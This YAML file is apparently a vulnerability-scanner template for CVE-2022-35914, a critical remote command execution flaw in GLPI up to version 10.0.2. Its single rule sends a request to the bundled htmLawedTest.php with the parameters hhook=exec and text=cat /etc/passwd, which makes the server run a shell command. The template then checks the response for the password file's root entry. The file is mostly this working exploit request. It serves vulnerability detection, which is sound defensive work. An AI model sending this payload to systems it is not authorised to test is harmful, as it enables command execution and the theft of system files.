id: CVE-2022-35914

info:
  name: GLPI <=10.0.2 - Remote Command Execution
  author: For3stCo1d
  severity: critical
  verified: true
  description: |
    GLPI through 10.0.2 is susceptible to remote command execution injection in /vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module.

rules:
  r0:
    request:
      method: GET
      path: /vendor/htmlawed/htmlawed/htmLawedTest.php
      headers:
        Content-Type: application/x-www-form-urlencoded
        Cookie: sid=foo
      body: sid=foo&hhook=exec&text=cat+/etc/passwd
    expression: response.status == 200 && "root:.*:0:0:".bmatches(response.body)
expression: r0()
